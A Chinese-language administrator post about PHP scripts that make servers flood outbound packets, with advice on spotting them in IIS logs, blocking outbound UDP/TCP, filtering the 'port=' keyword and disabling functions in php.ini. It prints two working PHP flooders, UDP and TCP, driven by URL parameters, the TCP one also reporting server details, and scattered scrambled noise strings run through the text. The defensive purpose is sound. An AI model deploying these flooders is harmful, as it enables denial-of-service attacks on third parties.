服务器php对外发包引起崩溃的解决办法paopao最近老听人说,php对外发包,引起服务器崩溃或被机房查封,今天闲着无事和大家一起分享paopao我总结的DEDECMS php对外发包引发服务器崩溃的终极解决方法,希望可以帮助大家解决服务器问题,让网站运行的更好: A4 G% h" l+ |; Q
一。php对外发包分析
# v6 I$ B/ C+ a2 N2 q! X 用php代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
$ r+ I, P* ^& M+ I 以下是代码片段:( f/ S: h1 Y/ }4 }
$packets = 0;; x1 i) P& v) V8 N9 }3 V
$ip = $_GET[\'ip\'];
( q, w- y3 ~5 f8 r+ ?$ U- F $rand = $_GET[\'port\'];
" n$ g% b9 w0 V; W& R& }# N set_time_limit(0);+ k- b& g) g, q2 [
ignore_user_abort(FALSE);( t; w7 M- w4 z6 b: M7 M
$exec_time = $_GET[\'time\'];sbxl-201206128 m. i. k; `% r F9 `( T3 W
$time = time();
& `) I. ]* j6 G0 } print \'Flooded: $ip on port $rand/ H u7 L* ~, {8 d/ j% `0 k' q% h f
\';+ u# L% B j7 D/ B9 s5 ], A
$max_time = $time+$exec_time;4 P+ I! ]+ _9 D6 J1 P
for($i=0;$i<65535;$i++){0 X6 V* V% d M4 @9 h$ X, A
$out .= \'X\';
: s* \7 Y% L: C$ l }1 J% `. F; ]9 A0 {
while(1){) I `$ f. l1 T! G S. x0 w
$packets++;7 c' l8 p# g$ z% n
if(time() > $max_time){
1 H3 F/ r5 \: x) v- g, I& Z1 q break;; ]8 |5 y) g3 i% h3 n8 r
}
: i1 p& w, D! }8 k% W# q( y $fp = fsockopen(\'udp://$ip\', $rand, $errno, $errstr, 5);* i0 c! X9 R6 `( v1 N e
if($fp){; B1 y; q3 L' X' `; v9 d3 u
fwrite($fp, $out);
: j( E3 h) F) V( @' i, c9 g5 ~ fclose($fp);- K% x& N8 c J$ T8 O% t
}
% Z* t$ S n* E( U# a1 m! Z/ ~. } }
0 x; s& P9 r. K3 }+ a echo \'Packet complete at \'.time(\'h:i:s\').\' with0 e( G* M) t0 x
$packets (\' . round(($packets*65)/1024, 2) . \' mB) packets averaging \'.
1 W, J' p1 N+ K8 ^: I2 o round($packets/$exec_time, 2) . \' packets/s ;
7 O; B8 }' J3 q& J6 }% e3 ^ ?>
* w4 i: E K8 n: B4 w0 y2 R [ 二。表现特征
6 s& ^; h$ C: H! h* _& s# u 一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是服务器不断收到大量数据包.
9 `/ X4 A3 k" C' y 近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题.' O, q. p) J8 |) W* A# q0 \* P- `: o
如何快速找到这些站?/ x, U6 u' ^; x: _
你可以打开日志. a& @: ]: e% M4 @
C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,
2 G7 n0 f0 @- r9 O5 k 里面有类似这样的记录: Z! _! E' Y0 {/ a3 w( i
2012-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1/ G. n8 B+ h, H' @. a4 O1 e7 H
最后三项783 Disabled 30_FreeHost_1- ` z0 w: h3 M8 P z
783就是这个站在IIS中的ID
O$ S8 ^ c% h 30_FreeHost_1就是所在池 E& s3 h7 \( G: \! j4 Z* z
三?解决办法% s0 G# B0 Z7 S
1.按上述找到这个网站后停止它.或停止池,并重启IIS.
+ T+ G* [% J! `7 e6 P% |1 { 2.在IP策略,或防火墙中,禁止所有udp向外发送
! ?" f9 t$ ^' n2 f/ N 在星外最新版本的安全包中,已带有4.0版本的IP策略【下载safe包】,您导入后就直接可以限制了外发的UDP包?下载这个包,之后导入安全策略?但这个策略并没有关闭DNS端口,部分攻击还是有效.
* x6 R) O! e& N J$ A) n4 i 为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成 地址 从源地址 任何地址 到目标地址'特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8' 保存后就行了)2 a$ J& G% D8 `1 S
在2011-4-27,我们上传了新的安全包,里面有一个'星外虚拟主机管理平台IP策略关闭所有UDP端口用.ipsec'文件,您可以导入它并启用,就可以关闭所有udp端口,就可以完全防止这类攻击,但是,这个策略由于关闭了DNS端口,会造成的这台服务器上无法用IE访问任何域名,因此,用户的采集功能也就用不了.(同样,如果在主控网站上用了这个策略,就会造成的受控自检不通过,因为解析不了域名,另外,部分用户反映此策略会造成的mysql不正常)/ h" ^" R- V+ v U- }
3.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.)
+ q0 U: g3 X2 I$ u5 e 4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS- S: f' K; ?, p( l0 n W Q" I
ignore_user_abort = On2 s4 O: H) ^2 `6 T3 Z
(注意前面的;号要删除)- j1 g' b/ ]4 i
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,1 M) O9 ]6 G" X; @! @8 u u' y
在后面加上8 X u# q1 I! z9 {4 Z% f
fsockopen,set_time_limit
I! ~- Q d/ q; ^4 Y 但这样会造成很多php程序都不正常.
$ Z. B+ d; o" p1 E7 d# C 另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么?
9 W7 C, w. b; b) B7 m' \, b 近期已有新的基于TCP攻击的PHPDDOS代码如下:8 O N# {9 t. r, s
以下是代码片段:
7 @7 g3 U' x7 \. {" E set_time_limit(999999);
$ A* P% u) S$ y $host = $_GET['host'];
4 d1 D% W+ f0 ^( j $port = $_GET['port'];
; C& r. X. G* Y; P* Y3 Y( M8 }( } $exec_time = $_GET['time'];4 E* w4 r/ {. R h
$packets = 64;. E( C4 Y2 W" s, e
ignore_user_abort(True);4 q1 D! l$ m) A+ d) E
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){, I, H+ s/ X( `: s( D$ X- I; k. u
if (StrLen($_GET['rat'])<>0){
?6 A' |. G2 F# r4 w6 ] echo $_GET['rat'].$_SERVER['HTTP_HOST'].'|'.GetHostByName($_SERVER['SERVER_NAME']).'|'.1 s5 f. d" j) O3 o8 X
php_uname().'|'.$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
Q! v& D% b4 X exit;' q" I8 e; k1 a* \0 P
}
. A8 @5 f. y" |! E' F" D0 ? exit;
2 M( B- x( a+ P: Z8 P& q, i }! x, C0 h( g9 i7 ^# b {! t
$max_time = time()+$exec_time;5 k3 y4 n) K5 e" Z6 O+ s; I1 w0 @
while(1){
# n& S, ]% N% n' j+ w2 { $packets++;& n: f1 p5 D$ p" |: g
if(time() > $max_time or $exec_time != 69){0 J' n/ n0 O0 ?8 E6 V
break;8 w$ B# Z1 F; M2 K. _9 {
} H; G( ~& D, C2 p; D* v2 J
$fp = fsockopen('tcp://$host', $port, $errno, $errstr, 0);
3 C5 t1 G+ l1 I. ?) S' @& | }0 {8 ]% o G& y8 t2 ?
?>
1 b" e" A: A2 p0 d. ?) W& K. j 同样,可以采有以下解决办法:$ s$ ?* j% w4 V ?7 l
1.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
* V1 ?( K& i% T" R& V ignore_user_abort = On, {( V! Z* w3 g3 @; e
(注意前面的;号要删除)' u) U- }0 U2 [- y3 z |- k
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
* b0 n! n/ S5 B5 q% ?* E 在后面加上& f+ r; \! a5 z2 w. E+ e U+ ]
fsockopen,set_time_limit
5 {$ U. t( l* q5 s1 t 但这样会造成很多php程序都不正常. 如果您是IDC,给客户提供空间的,禁用函数可能导致客户程序无法运行,所以一般不要用此办法; }! z0 p! d& r b
2.在IP策略中禁止所有外访的TCP数据包,但这样会造成的采集功能无效,也不能用在主控服务器上?
) W3 X6 @- U7 I) L+ A( }- u9 u 3.在服务器要用关键词tcp:或udp:搜索所有php类文件,找到攻击文件,删除它?/ B0 S. ^( U/ B+ Z+ L2 L
文章出自医院网站优化 http://www.ahyyqing.com,转载请注明出处。
# B- p2 o) R" K$ M1 J4 D0 M |